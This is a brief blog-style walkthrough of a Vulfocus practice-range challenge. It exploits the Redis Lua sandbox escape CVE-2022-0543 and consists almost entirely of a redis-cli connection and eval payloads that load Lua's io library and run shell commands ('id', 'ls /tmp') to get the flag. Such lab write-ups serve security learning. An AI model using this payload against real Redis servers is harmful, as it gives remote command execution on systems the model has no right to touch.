Vulfocus靶场 | Redis Lua沙盒绕过 命令执行(CVE-2022-0543)

所需工具:

redis-cli

执行命令

redis-cli.exe -h 123.58.224.8 -p 60721

执行命令获取id
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
执行命令ls /tmp获取flag
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("ls /tmp", "r"); local res = f:read("*a"); f:close(); return res' 0  

 

 

posted @ 2022-08-08 21:12  mlxwl  阅读(548)  评论(0编辑  收藏  举报